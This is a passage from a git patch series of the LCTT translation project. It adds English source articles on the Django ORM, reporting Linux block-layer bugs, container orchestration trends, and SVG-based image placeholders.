manage.py shell` from the main directory of our Django project. + +``` +/srv/web/django/ $ python manage.py shell + +Python 3.6.3 (default, Nov  9 2017, 15:58:30) +[GCC 4.2.1 Compatible Apple LLVM 9.0.0 (clang-900.0.38)] on darwin +Type "help", "copyright", "credits" or "license" for more information. +(InteractiveConsole) +>>> +``` + +This will bring us into an interactive console. The [`shell` command][15] did a lot of setup for us, including importing our settings and configuring the Django environment. While we've launched the shell, we can't access our Blog model until we import it. + +``` +>>> from blog.models import * +``` + +This imports all the blog models so we can play with our blog posts and authors. + +For starters, let's get a list of all the authors. + +``` +>>> Author.objects.all() +``` + +What we'll get from this command is a `QuerySet` of results, which lists all our Author objects. We also won't fill our entire console, because if there are a lot of results, Django will automatically truncate the printed results. + +``` +>>> Author.objects.all() +, + , '...(remaining elements truncated)...'] +``` + +We can select a single author using `get` instead of `all`. But we need a bit more information to `get` a single record. In relational databases, tables have a primary key field that has a unique identifier for each and every record in a table; however, author names are not unique. Many people [share the same name][16], so it's not a good unique constraint. A way to get around this is to have a sequence (1, 2, 3...) or a universal unique identifier (UUID) as the primary key. But since these aren't nicely useable by humans, we can manipulate our Author objects by using `name`. + +``` +>>> Author.objects.get(name="VM (Vicky) Brasseur") + +``` + +This time, we have a single object that we can interact with, instead of a `QuerySet` list. We can interact with this object pythonically, using any of the table columns as attributes to look at the object. + +``` +>>> vmb = Author.objects.get(name="VM (Vicky) Brasseur") +>>> vmb.name +u'VM (Vicky) Brasseur' +``` + +And this is where the cool stuff happens. Normally in relational databases, if we want to show information for other tables, we'd need to write a `LEFT JOIN`, or other table-coupling functions, making sure that our foreign keys match up between tables. Django takes care of that for us. + +In our model, authors write many posts, so our Author object can check what posts the author has made. + +``` +>>> vmb.posts.all() +QuerySet[, + , + , + '...(remaining elements truncated)...'] +``` + +We can manipulate `QuerySets` using normal pythonic list manipulations. + +``` +>>> for post in vmb.posts.all(): +...   print(post.title) +... +7 tips for nailing your job interview +5 tips for getting the biggest bang for your cover letter buck +Quit making these 10 common resume mistakes +``` + +To do more complex querying, we can use filters instead of getting everything. Here is where it gets tricky. In SQL, you have options such as `like`, `contains`, and other filtering objects. You can do all these things in the ORM, too, but it has a special way of doing them: by using implicitly (rather than explicitly) defined functions. + +If I call a function `do_thing()` in my Python script, I'd expect somewhere there would be a matching `def do_thing`. This is an explicit functional definition. However, in the ORM, you can call a function that  _isn't explicitly defined_ . Before, we were using `name` to match on a name. But, if we wanted to do a substring search, we can use `name__contains`. + +``` +>>> Author.objects.filter(name__contains="Vic") +QuerySet[] +``` + +Now, a small note about the double underscore (`__`). These are  _very_  Python. You may have seen `__main__` or `__repr__` in your travels in Pythonland. These are sometimes referred to as `dunder methods`, a shortening of "double underscore." There are only a few non-alphanumeric characters that can be used in object names in Python; underscore is one of them. These are used in the ORM as an explicit separator of different parts of the filter key name. Under the hood, the string is split by these underscores, and the tokens are processed separately. `name__contains` gets changed into `attribute: name, filter: contains`. In other programming languages, you may use arrows instead, such as `name->contains` in PHP. Don't let dunders scare you, they're just pythonic helpers! (And if you squint, you could say they look like little snakes, little pythons that want to help you with your code.) + +The ORM is extremely powerful and very pythonic. But what about that Django admin site I mentioned above? + +### [django-admin.png][6] + +![Django Admin](https://opensource.com/sites/default/files/u128651/django-admin.png "Django Admin") + +One of the brilliant user-accessibility features of Django is its admin interface. If you define your models, you get a nice web-based editing portal, for free. + +And what powers this? The ORM. + +### [django-admin-author.png][7] + +![Authors list in Django Admin](https://opensource.com/sites/default/files/u128651/django-admin-author.png "Authors list in Django Admin") + +That's right! Given the code used to create the original models, Django turned that into a web-based portal, which is powered using the same raw functions we used earlier. By default, the admin is basic, but it's just a matter of adding more definitions in your model to change how the admin looks. For example, those `__str__` methods from earlier? We use those to define what an Author object looks like (in this case, just the name of the author). With a bit of work, you can make an interface that feels like a full content management system that allows your users to edit their own content with ease (for example, adding fields and filters for marking a post "published"). + +If you'd like to know more, the [Django Girls tutorial][17] section about [the ORM][18] has a detailed walkthrough. There's also copious documentation on the [Django project website][19]. + +-------------------------------------------------------------------------------- + +作者简介: + +Katie McLaughlin - Katie has worn many different hats over the years. She has previously been a software developer for many languages, systems administrator for multiple operating systems, and speaker on many different topics. When she's not changing the world, she enjoys making cooking, tapestries, and seeing just how well various application stacks handle emoji. + +------------------------ + +via: https://opensource.com/article/17/11/django-orm + +作者:[Katie McLaughlin Feed ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://opensource.com/users/glasnt +[1]:https://opensource.com/resources/python?intcmp=7016000000127cYAAQ +[2]:https://opensource.com/resources/python/ides?intcmp=7016000000127cYAAQ +[3]:https://opensource.com/resources/python/gui-frameworks?intcmp=7016000000127cYAAQ +[4]:https://opensource.com/tags/python?intcmp=7016000000127cYAAQ +[5]:https://developers.redhat.com/?intcmp=7016000000127cYAAQ +[6]:https://opensource.com/file/377811 +[7]:https://opensource.com/file/377816 +[8]:https://opensource.com/article/17/11/django-orm?rate=iwO0q67yiUUPweMIMoyLbbYyhK5RTOOzEtyiNkJ0eBE +[9]:https://opensource.com/user/41661/feed +[10]:https://www.flickr.com/people/crsan/ +[11]:https://creativecommons.org/licenses/by-sa/4.0/ +[12]:https://www.djangoproject.com/ +[13]:http://www.djangopony.com/ +[14]:https://docs.djangoproject.com/en/1.11/ref/contrib/admin/ +[15]:https://docs.djangoproject.com/en/1.11/ref/django-admin/#shell +[16]:https://2016.katieconf.xyz/ +[17]:https://djangogirls.org/ +[18]:https://tutorial.djangogirls.org/en/django_orm/ +[19]:https://docs.djangoproject.com/en/1.11/topics/db/ +[20]:https://opensource.com/users/glasnt +[21]:https://opensource.com/users/glasnt +[22]:https://opensource.com/article/17/11/django-orm#comments From fa299e0b50b31eba6df09a0ab22a07a11057ef60 Mon Sep 17 00:00:00 2001 From: Ezio Date: Wed, 29 Nov 2017 15:58:41 +0800 Subject: [PATCH 0050/1627] =?UTF-8?q?20171129-4=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...layer introduction part 1 the bio layer.md | 37 +++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 sources/tech/20171029 A block layer introduction part 1 the bio layer.md diff --git a/sources/tech/20171029 A block layer introduction part 1 the bio layer.md b/sources/tech/20171029 A block layer introduction part 1 the bio layer.md new file mode 100644 index 0000000000..b01269ff63 --- /dev/null +++ b/sources/tech/20171029 A block layer introduction part 1 the bio layer.md @@ -0,0 +1,37 @@ +A block layer introduction part 1: the bio layer +============================================================ + +### A block layer introduction part 1: the bio layer + +In reply to: [A block layer introduction part 1: the bio layer][1] by amarao +Parent article: [A block layer introduction part 1: the bio layer][2]Hi, +the problem you describe here is not directly related to the block layer. It is probably a driver bug, possible a SCSI-layer bug, but definitely not a block-layer problem. +Reporting bugs against Linux is, unfortunately, a bit of a hit-and-miss affair. Some developers refused to touch bugzilla, some love it, and some (like me) only use it begrudgingly. +The alternative is to send email. For that you need to choose the right list and maybe the right developer, and you need to catch them when they are in a good mood or aren't too busy or not on holidays. Some people will make an effort to respond to everything, others are completely unpredictable - and that is for me who usually sends a patch with any bug report. If you just have a bug that you barely understand yourself, your expected response rate is probably lower. Sad, but true. + +Lots of bugs do get responded to and dealt with, but lots do not. + +I don't think it is fair to say that nobody cares, but it probably is true that nobody sees it as being as important as you do. If you want a solution, then you need to drive it. One way to drive it is to spend money on a consultant or with a support contract from a distributor. I suspect that isn't possible in your situation. Another way is to learn how the code works and find a solution yourself. Lots of people do that, but again it might not be an option for you. Another way is to keep raising the issue on different relevant forums until you get a response. Persistence can bear fruit. You would need to be prepared to perform whatever testing is asked of you, possibly including building a new kernel to test. + +If you are able to reproduce this problem on a recent kernel (4.12 or later) I suggest that you email a report to +linux-kernel@vger.kernel.org, linux-scsi@vger.kernel.org, and me (neilb@suse.com) (note that you do not need to subscribe to these lists to send mail, just send it). Describe the hardware and how to trigger the problem. +Include the stack trace of any process in "D" state. You can get this with +cat /proc/$PID/stack +where "$PID" is the pid of the process. + +Be sure to avoid complaining or saying how this has been broken for years and how it is grossly inadequate. Nobody cares about that. We do care about bugs and generally want to fix them. So just report the relevant facts. +Try to include all facts in the mail rather than via links to somewhere else. Sometimes links are necessary, but in the case of your script, it is 8 lines long so just include it in the email (and avoid descriptions like "fuckup"; just call it "broken" or similar). Also make sure your email isn't sent as HTML. We like just plain text. HTML is rejected by all @vger.kernel.org mailing lists. You might need to configure your email program to not send HTML. + +-------------------------------------------------------------------------------- + +via: https://lwn.net/Articles/737655/ + +作者:[ neilbrown][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://lwn.net/Articles/737655/ +[1]:https://lwn.net/Articles/737588/ +[2]:https://lwn.net/Articles/736534/ From 93cd509799a98651e57c93becc74be65b8636f61 Mon Sep 17 00:00:00 2001 From: Ezio Date: Wed, 29 Nov 2017 16:01:36 +0800 Subject: [PATCH 0051/1627] =?UTF-8?q?20171129-5=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...20 Containers and Kubernetes Whats next.md | 97 +++++++++++++++++++ 1 file changed, 97 insertions(+) create mode 100644 sources/tech/20171120 Containers and Kubernetes Whats next.md diff --git a/sources/tech/20171120 Containers and Kubernetes Whats next.md b/sources/tech/20171120 Containers and Kubernetes Whats next.md new file mode 100644 index 0000000000..52f3364d31 --- /dev/null +++ b/sources/tech/20171120 Containers and Kubernetes Whats next.md @@ -0,0 +1,97 @@ +Containers and Kubernetes: What's next? +============================================================ + +### What's ahead for container orchestration and Kubernetes? Here's an expert peek + +![CIO_Big Data Decisions_2](https://enterprisersproject.com/sites/default/files/styles/620x350/public/images/CIO_Big%20Data%20Decisions_2.png?itok=Y5zMHxf8 "CIO_Big Data Decisions_2") + +If you want a basic idea of where containers are headed in the near future, follow the money. There’s a lot of it: 451 Research projects that the overall market for containers will hit roughly [$2.7 billion in 2020][4], a 3.5-fold increase from the $762 million spent on container-related technology in 2016. + +There’s an obvious fundamental factor behind such big numbers: Rapidly increasing containerization. The parallel trend: As container adoption grows, so will container  _orchestration_  adoption. + +As recent survey data from  [_The New Stack_][5]  indicates, container adoption is the most significant catalyst of orchestration adoption: 60 percent of respondents who’ve deployed containers broadly in production report they’re also using Kubernetes widely in production. Another 19 percent of respondents with broad container deployments in production were in the initial stages of broad Kubernetes adoption. Meanwhile, just 5 percent of those in the initial phases of deploying containers in production environments were using Kubernetes broadly – but 58 percent said they were preparing to do so. It’s a chicken-and-egg relationship. + + +Most experts agree that an orchestration tool is essential to the scalable [long-term management of containers][6] – and corresponding developments in the marketplace. “The next trends in container orchestration are all focused on broadening adoption,” says Alex Robinson, software engineer at [Cockroach Labs][7]. + +This is a quickly shifting landscape, one that is just starting to realize its future potential. So we checked in with Robinson and other practitioners to get their boots-on-the-ground perspective on what’s next in container orchestration – and for Kubernetes itself. + +### **Container orchestration shifts to mainstream** + +We’re at the precipice common to most major technology shifts, where we transition from the careful steps of early adoption to cliff-diving into commonplace use. That will create new demand for the plain-vanilla requirements that make mainstream adoption easier, especially in large enterprises. + +“The gold rush phase of early innovation has slowed down and given way to a much stronger focus on stability and usability,” Robinson says. “This means we'll see fewer major announcements of new orchestration systems, and more security options, management tools, and features that make it easier to take advantage of the flexibility already inherent in the major orchestration systems.” + +### **Reduced complexity** + +On a related front, expect an intensifying effort to cut back on the complexity that some organizations face when taking their first plunge into container orchestration. As we’ve covered before, deploying a container might be “easy,” but [managing containers long-term ][8]requires more care. + +“Today, container orchestration is too complex for many users to take full advantage,” says My Karlsson, developer at [Codemill AB][9]. “New users are often struggling just to get single or small-size container configurations running in isolation, especially when applications are not originally designed for it. There are plenty of opportunities to simplify the orchestration of non-trivial applications and make the technology more accessible.” + +### **Increasing focus on hybrid cloud and multi-cloud** + +As adoption of containers and container orchestration grows, more organizations will scale from a starting point of, say, running non-critical workloads in a single environment to more [complex use cases][10] across multiple environments. For many companies, that will mean managing containerized applications (and particularly containerized microservices) across [hybrid cloud][11] and [multi-cloud][12] environments, often globally. + +"Containers and Kubernetes have made hybrid cloud and application portability a reality,” says [Brian Gracely][13], director of [Red Hat][14] OpenShift product strategy. “Combined with the Open Service Broker, we expect to see an explosion of new applications that combine private and public cloud resources." + +“I believe that federation will get a push, enabling much-wanted features such as seamless multi-region and multi-cloud deployments,” says Carlos Sanchez, senior software engineer at [CloudBees][15].  + +**[ Want CIO wisdom on hybrid cloud and multi-cloud strategy? See our related resource, **[**Hybrid Cloud: The IT leader's guide**][16]**. ]** + +### **Continued consolidation of platforms and tools** + +Technology consolidation is common trend; container orchestration is no exception. + +“As containerization goes mainstream, engineers are consolidating on a very small number of technologies to run their [microservices and] containers and Kubernetes will become the dominant container orchestration platform, far outstripping other platforms,” says Ben Newton, analytics lead at [Sumo Logic][17]. “Companies will adopt Kubernetes to drive a cloud-neutral approach as Kubernetes provides a reasonably clear path to reduce dependence on [specific] cloud ecosystems.**”** + +### **Speaking of Kubernetes, what’s next?** + +"Kubernetes is here for the long haul, and the community driving it is doing great job – but there's lots ahead,” says Gadi Naor, CTO and co-founder of [Alcide][18]. Our experts shared several predictions specific to [the increasingly popular Kubernetes platform][19]:  + + **_Gadi Naor at Alcide:_**  “Operators will continue to evolve and mature, to a point where applications running on Kubernetes will become fully self-managed. Deploying and monitoring microservices on top of Kubernetes with [OpenTracing][20] and service mesh frameworks such as [istio][21] will help shape new possibilities.” + + **_Brian Gracely at Red Hat:_**  “Kubernetes continues to expand in terms of the types of applications it can support. When you can run traditional applications, cloud-native applications, big data applications, and HPC or GPU-centric applications on the same platform, it unlocks a ton of architectural flexibility.” + + **_Ben Newton at Sumo Logic: _ “**As Kubernetes becomes more dominant, I would expect to see more normalization of the operational mechanisms – particularly integrations into third-party management and monitoring platforms.” + + **_Carlos Sanchez at CloudBees: _** “In the immediate future there is the ability to run without Docker, using other runtimes...to remove any lock-in. [Editor’s note: [CRI-O][22], for example, offers this ability.] “Also, [look for] storage improvements to support enterprise features like data snapshotting and online volume resizing.” + + + **_Alex Robinson at Cockroach Labs: _ “**One of the bigger developments happening in the Kubernetes community right now is the increased focus on managing [stateful applications][23]. Managing state in Kubernetes right now is very difficult if you aren't running in a cloud that offers remote persistent disks, but there's work being done on multiple fronts [both inside Kubernetes and by external vendors] to improve this.” + +-------------------------------------------------------------------------------- + +via: https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next + +作者:[Kevin Casey ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://enterprisersproject.com/user/kevin-casey +[1]:https://enterprisersproject.com/article/2017/11/kubernetes-numbers-10-compelling-stats +[2]:https://enterprisersproject.com/article/2017/11/how-enterprise-it-uses-kubernetes-tame-container-complexity +[3]:https://enterprisersproject.com/article/2017/11/5-kubernetes-success-tips-start-smart?sc_cid=70160000000h0aXAAQ +[4]:https://451research.com/images/Marketing/press_releases/Application-container-market-will-reach-2-7bn-in-2020_final_graphic.pdf +[5]:https://thenewstack.io/ +[6]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul +[7]:https://www.cockroachlabs.com/ +[8]:https://enterprisersproject.com/article/2017/10/microservices-and-containers-6-management-tips-long-haul +[9]:https://codemill.se/ +[10]:https://www.redhat.com/en/challenges/integration?intcmp=701f2000000tjyaAAA +[11]:https://enterprisersproject.com/hybrid-cloud +[12]:https://enterprisersproject.com/article/2017/7/multi-cloud-vs-hybrid-cloud-whats-difference +[13]:https://enterprisersproject.com/user/brian-gracely +[14]:https://www.redhat.com/en +[15]:https://www.cloudbees.com/ +[16]:https://enterprisersproject.com/hybrid-cloud?sc_cid=70160000000h0aXAAQ +[17]:https://www.sumologic.com/ +[18]:http://alcide.io/ +[19]:https://enterprisersproject.com/article/2017/10/how-explain-kubernetes-plain-english +[20]:http://opentracing.io/ +[21]:https://istio.io/ +[22]:http://cri-o.io/ +[23]:https://opensource.com/article/17/2/stateful-applications +[24]:https://enterprisersproject.com/article/2017/11/containers-and-kubernetes-whats-next?rate=PBQHhF4zPRHcq2KybE1bQgMkS2bzmNzcW2RXSVItmw8 +[25]:https://enterprisersproject.com/user/kevin-casey From 213c281d59eae115d94dce92fd465804cf6e7239 Mon Sep 17 00:00:00 2001 From: Ezio Date: Wed, 29 Nov 2017 16:04:24 +0800 Subject: [PATCH 0052/1627] =?UTF-8?q?20171129-6=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...lder and Other Image Loading Techniques.md | 239 ++++++++++++++++++ 1 file changed, 239 insertions(+) create mode 100644 sources/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md diff --git a/sources/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md b/sources/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md new file mode 100644 index 0000000000..964eca9356 --- /dev/null +++ b/sources/tech/20171031 How to use SVG as a Placeholder and Other Image Loading Techniques.md @@ -0,0 +1,239 @@ +How to use SVG as a Placeholder, and Other Image Loading Techniques +============================================================ + +![](https://cdn-images-1.medium.com/max/1563/0*zJGl1vKLttcJGIL4.jpg) +Generating SVGs from images can be used for placeholders. Keep reading! + +I’m passionate about image performance optimisation and making images load fast on the web. One of the most interesting areas of exploration is placeholders: what to show when the image hasn’t loaded yet. + +During the last days I have come across some loading techniques that use SVG, and I would like to describe them in this post. + +In this post we will go through these topics: + +* Overview of different types of placeholders + +* SVG-based placeholders (edges, shapes and silhouettes) + +* Automating the process. + +### Overview of different types of placeholders + +In the past [I have written about placeholders and lazy-load of images][28], and also [talked about it][29]. When doing lazy-loading of images it’s a good idea to think about what to render as a placeholder, since it can have a big impact in user’s perceived performance. In the past I described several options: + + +![](https://cdn-images-1.medium.com/max/1563/0*jlMM144vAhH-0bEn.png) + +Several strategies to fill the area of an image before it loads. + +* Keeping the space empty for the image: In a world of responsive design, this prevents content from jumping around. Those layout changes are bad from a user’s experience point of view, but also for performance. The browser is forced to do layout re calculations every time it fetches the dimensions of an image, leaving space for it. + +* Placeholder: Imagine that we are displaying a user’s profile image. We might want to display a silhouette in the background. This is shown while the main image is loaded, but also when that request failed or when the user didn’t set any profile picture at all. These images are usually vector-based, and due to their small size are a good candidate to be inlined. + +* Solid colour: Take a colour from the image and use it as the background colour for the placeholder. This can be the dominant colour, the most vibrant… The idea is that it is based on the image you are loading and should help making the transition between no image to image loaded smoother. + +* Blurry image: Also called blur-up technique. You render a tiny version of the image and then transition to the full one. The initial image is tiny both in pixels and kBs. To remove artifacts the image is scaled up and blurred. I have written previously about this on [How Medium does progressive image loading][1], [Using WebP to create tiny preview images][2], and [More examples of Progressive Image Loading][3] . + +Turns out there are many other variations and lots of smart people are developing other techniques to create placeholders. + +One of them is having gradients instead of solid colours. The gradients can create a more accurate preview of the final image, with very little overhead (increase in payload). + + +![](https://cdn-images-1.medium.com/max/1250/0*ecPkBAl69ayvRctn.jpg) +Using gradients as backgrounds. Screenshot from Gradify, which is not online anymore. Code [on GitHub][4]. + +Another technique is using SVGs based on the image, which is getting some traction with recent experiments and hacks. + +### SVG-based placeholders + +We know SVGs are ideal for vector images. In most cases we want to load a bitmap one, so the question is how to vectorise an image. Some options are using edges, shapes and areas. + +#### Edges + +In [a previous post][30] I explained how to find out the edges of an image and create an animation. My initial goal was to try to draw regions, vectorising the image, but I didn’t know how to do it. I realised that using the edges could also be innovative and I decided to animate them creating a “drawing” effect. + +[Drawing images using edge detection and SVG animation +Back in the days SVG was barely used and supported. Some time after we started using them as an alternative to classic…medium.com][31][][32] + +#### Shapes + +SVG can also be used to draw areas from the image instead of edges/borders. In a way, we would vectorise a bitmap image to create a placeholder. + +Back in the days I tried to do something similar with triangles. You can see the result in my talks [at CSSConf][33] and [Render Conf][34]. + + +The codepen above is a proof of concept of a SVG-based placeholder composed of 245 triangles. The generation of the triangles is based on [Delaunay triangulation][35] using [Possan’s polyserver][36]. As expected, the more triangles the SVG uses, the bigger the file size. + +#### Primitive and SQIP, a SVG-based LQIP technique + +Tobias Baldauf has been working on another Low-Quality Image Placeholder technique using SVGs called [SQIP][37]. Before digging into SQIP itself I will give an overview of [Primitive][38], a library on which SQIP is based. + +Primitive is quite fascinating and I definitely recommend you to check it out. It converts a bitmap image into a SVG composed of overlapping shapes. Its small size makes it suitable for inlining it straight into the page. One less roundtrip, and a meaningful placeholder within the initial HTML payload. + +Primitive generates an image based on shapes like triangles, rectangles and circles (and a few others). In every step it adds a new one. The more steps, the resulting image looks closer to the original one. If your output is SVG it also means the size of the output code will be larger. + +In order to understand how Primitive works, I ran it through a couple of images. I generated SVGs for the artwork using 10 shapes and 100 shapes: + + ** 此处有Canvas,请手动处理 ** + +![](https://cdn-images-1.medium.com/max/625/1*y4sr9twkh_WyZh6h0yH98Q.png) + + +![](https://cdn-images-1.medium.com/max/625/1*cqyhYnx83LYvhGdmg2dFDw.png) + +![](https://cdn-images-1.medium.com/max/625/1*qQP5160gPKQdysh0gFnNfw.jpeg) +Processing [this picture][5] using Primitive, using [10 shapes][6] and [100 shapes][7]. + + +![](https://cdn-images-1.medium.com/max/625/1*PWZLlC4lrLO4CVv1GwR7qA.png) + + + +![](https://cdn-images-1.medium.com/max/625/1*khnga22ldJKOZ2z45Srh8A.png) + + +![](https://cdn-images-1.medium.com/max/625/1*N-20rR7YGFXiDSqIeIyOjA.jpeg) +Processing [this picture][8] using Primitive, using [10 shapes][9] and [100 shapes][10]. + +When using 10 shapes the images we start getting a grasp of the original image. In the context of image placeholders there is potential to use this SVG as the placeholder. Actually, the code for the SVG with 10 shapes is really small, around 1030 bytes, which goes down to ~640 bytes when passing the output through SVGO. + +``` + +``` + +The images generated with 100 shapes are larger, as expected, weighting ~5kB after SVGO (8kB before). They have a great level of detail with a still small payload. The decision of how many triangles to use will depend largely on the type of image (eg contrast, amount of colours, complexity) and level of detail. + +It would be possible to create a script similar to [cpeg-dssim][39] that tweaks the amount of shapes used until a [structural similarity][40] threshold is met (or a maximum number of shapes in the worst case). + +These resulting SVGs are great also to use as background images. Being size-constrained and vector-based they are a good candidate for hero images and large backgrounds that otherwise would show artifacts. + +#### SQIP + +In [Tobias’ own words][41]: + +> SQIP is an attempt to find a balance between these two extremes: it makes use of [Primitive][42] to generate a SVG consisting of several simple shapes that approximate the main features visible inside the image, optimizes the SVG using [SVGO][43] and adds a Gaussian Blur filter to it. This produces a SVG placeholder which weighs in at only ~800–1000 bytes, looks smooth on all screens and provides an visual cue of image contents to come. + +The result is similar to using a tiny placeholder image for the blur-up technique (what [Medium][44] and [other sites][45] do). The difference is that instead of using a bitmap image, eg JPG or WebP, the placeholder is SVG. + +If we run SQIP against the original images we’ll get this: + + +![](https://cdn-images-1.medium.com/max/938/0*yUY1ZFP27vFYgj_o.png) + + + +![](https://cdn-images-1.medium.com/max/938/0*DKoZP7DXFvUZJ34E.png) +The output images using SQIP for [the first picture][11] and [the second one][12]. + +The output SVG is ~900 bytes, and inspecting the code we can spot the `feGaussianBlur` filter applied to the group of shapes: + +``` + +``` + +SQIP can also output an image tag with the SVG contents Base 64 encoded: + +``` + +``` + +#### Silhouettes + +We just had a look at using SVGs for edges and primitive shapes. Another possibility is to vectorise the images “tracing” them. [Mikael Ainalem][47] shared [a codepen][48] a few days ago showing how to use a 2-colour silhouette as a placeholder. The result is really pretty: + + +![](https://cdn-images-1.medium.com/max/1250/1*r6HbVnBkISCQp_UVKjOJKQ.gif) + +The SVGs in this case were hand drawn, but the technique quickly spawned integrations with tools to automate the process. + +* [Gatsby][13], a static site generator using React supports these traced SVGs now. It uses [a JS PORT of potrace][14] to vectorise the images. + +* [Craft 3 CMS][15], which also added support for silhouettes. It uses [a PHP port of potrace][16]. + + +* [image-trace-loader][17], a Webpack loader that uses potrace to process the images. + + +It’s also interesting to see a comparison of the output between Emil’s webpack loader (based on potrace) and Mikael’s hand-drawn SVGs. + + +I assume the output generated by potrace is using the default options. However, it’s possible to tweak them. Check [the options for image-trace-loader][49], which are pretty much [the ones passed down to potrace][50]. + +### Summary + +We have seen different tools and techniques to generate SVGs from images and use them as placeholders. The same way [WebP is a fantastic format for thumbnails][51], SVG is also an interesting format to use in placeholders. We can control the level of detail (and thus, size), it’s highly compressible and easy to manipulate with CSS and JS. + +#### Extra Resources + +This post made it to [the top of Hacker News][52]. I’m very grateful for that, and for all the links to other resources that have been shared in the comments on that page. Here are a few of them! + +* [Geometrize][18] is a port of Primitive written in Haxe. There is also [a JS implementation][19] that you can try out directly [on your browser][20]. + +* [Primitive.js][21], which is a port of Primitive in JS. Also, [primitive.nextgen][22], which is a port of the Primitive desktop app using Primitive.js and Electron. + +* There are a couple of Twitter accounts where you can see examples of images generated with Primitive and Geometrize. Check out [@PrimitivePic][23] and [@Geometrizer][24]. + +* [imagetracerjs][25], which is a raster image tracer and vectorizer written in JavaScript. There are also ports for [Java][26] and [Android][27]. + +-------------------------------------------------------------------------------- + +via: https://medium.freecodecamp.org/using-svg-as-placeholders-more-image-loading-techniques-bed1b810ab2c + +作者:[ José M. Pérez][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://medium.freecodecamp.org/@jmperezperez?source=post_header_lockup +[1]:https://medium.com/@jmperezperez/how-medium-does-progressive-image-loading-fd1e4dc1ee3d +[2]:https://medium.com/@jmperezperez/using-webp-to-create-tiny-preview-images-3e9b924f28d6 +[3]:https://medium.com/@jmperezperez/more-examples-of-progressive-image-loading-f258be9f440b +[4]:https://github.com/fraser-hemp/gradify +[5]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-281184-square.jpg +[6]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-281184-square-10.svg +[7]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-281184-square-100.svg +[8]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-618463-square.jpg +[9]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-618463-square-10.svg +[10]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-618463-square-100.svg +[11]:https://jmperezperez.com/assets/images/posts/svg-placeholders/pexels-photo-281184-square-sqip.svg +[12]:https://jmperezperez.com/svg-placeholders/%28/assets/images/posts/svg-placeholders/pexels-photo-618463-square-sqip.svg +[13]:https://www.gatsbyjs.org/ +[14]:https://www.npmjs.com/package/potrace +[15]:https://craftcms.com/ +[16]:https://github.com/nystudio107/craft3-imageoptimize/blob/master/src/lib/Potracio.php +[17]:https://github.com/EmilTholin/image-trace-loader +[18]:https://github.com/Tw1ddle/geometrize-haxe +[19]:https://github.com/Tw1ddle/geometrize-haxe-web +[20]:http://www.samcodes.co.uk/project/geometrize-haxe-web/ +[21]:https://github.com/ondras/primitive.js +[22]:https://github.com/cielito-lindo-productions/primitive.nextgen +[23]:https://twitter.com/PrimitivePic +[24]:https://twitter.com/Geometrizer +[25]:https://github.com/jankovicsandras/imagetracerjs +[26]:https://github.com/jankovicsandras/imagetracerjava +[27]:https://github.com/jankovicsandras/imagetracerandroid +[28]:https://medium.com/@jmperezperez/lazy-loading-images-on-the-web-to-improve-loading-time-and-saving-bandwidth-ec988b710290 +[29]:https://www.youtube.com/watch?v=szmVNOnkwoU +[30]:https://medium.com/@jmperezperez/drawing-images-using-edge-detection-and-svg-animation-16a1a3676d3 +[31]:https://medium.com/@jmperezperez/drawing-images-using-edge-detection-and-svg-animation-16a1a3676d3 +[32]:https://medium.com/@jmperezperez/drawing-images-using-edge-detection-and-svg-animation-16a1a3676d3 +[33]:https://jmperezperez.com/cssconfau16/#/45 +[34]:https://jmperezperez.com/renderconf17/#/46 +[35]:https://en.wikipedia.org/wiki/Delaunay_triangulation +[36]:https://github.com/possan/polyserver +[37]:https://github.com/technopagan/sqip +[38]:https://github.com/fogleman/primitive +[39]:https://github.com/technopagan/cjpeg-dssim +[40]:https://en.wikipedia.org/wiki/Structural_similarity +[41]:https://github.com/technopagan/sqip +[42]:https://github.com/fogleman/primitive +[43]:https://github.com/svg/svgo +[44]:https://medium.com/@jmperezperez/how-medium-does-progressive-image-loading-fd1e4dc1ee3d +[45]:https://medium.com/@jmperezperez/more-examples-of-progressive-image-loading-f258be9f440b +[46]:http://www.w3.org/2000/svg +[47]:https://twitter.com/mikaelainalem +[48]:https://codepen.io/ainalem/full/aLKxjm/ +[49]:https://github.com/EmilTholin/image-trace-loader#options +[50]:https://www.npmjs.com/package/potrace#parameters +[51]:https://medium.com/@jmperezperez/using-webp-to-create-tiny-preview-images-3e9b924f28d6 +[52]:https://news.ycombinator.com/item?id=15696596 From 4b02b899106fa4240a91fde19069df16d82ab206 Mon Sep 17 00:00:00 2001 From: Ezio Date: Wed, 29 Nov 2017 16:07:44 +0800 Subject: [PATCH 0053/1627] =?UTF-8?q?20171129-7=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Could Be Your New Favorite Container OS.md | 147 